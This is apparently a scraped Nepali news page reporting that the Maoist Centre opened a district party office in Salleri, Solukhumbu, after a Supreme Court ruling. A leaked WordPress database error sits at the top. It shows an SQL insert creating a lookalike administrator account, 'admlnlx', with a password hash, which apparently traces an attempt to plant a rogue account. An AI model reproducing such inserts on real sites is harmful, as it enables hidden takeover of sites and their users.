WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNYt3/x1hURuWeYLjki.YnqqA234nE1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:11:54', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सर्वोच्च अदालतले नेकपाको आधिकारिकता ऋषि कट्टेललाई दिँदै एमाले र माओवादी केन्द्रलाई व्युँताइदिएपछि । नेकपा माओबादी केन्द्र सोलुखुम्बुले सल्लेरीमा जिल्ला पार्टी कार्यालय स्थापना गरेको छ।
जिल्ला कमिटी संयोजक गोम्बु शेर्पा ‘कर्ज्याङ’, नेताहरु ध्रुब पराजुली, हिमाल गिरी लगायत अन्य नेता कार्यकर्ताहरुको उपस्थितिमा बिधिवत रुपमा पार्टीको बोर्ड राखेर शनिबार माओवादी केन्द्रले कार्यालयको स्थापना गरेको हो। तत्कालीन एमालेसंग पार्टी एकीकरण पूर्ब कार्यालय रहेकै स्थानमा माओवादी केन्द्रको पार्टी कार्यालय स्थापना गरिएको सो पार्टीले जनाएको छ । एमालेले भने यस अघि नै जिल्लामा पार्टी कार्यालय स्थापना गरिसकेको छ।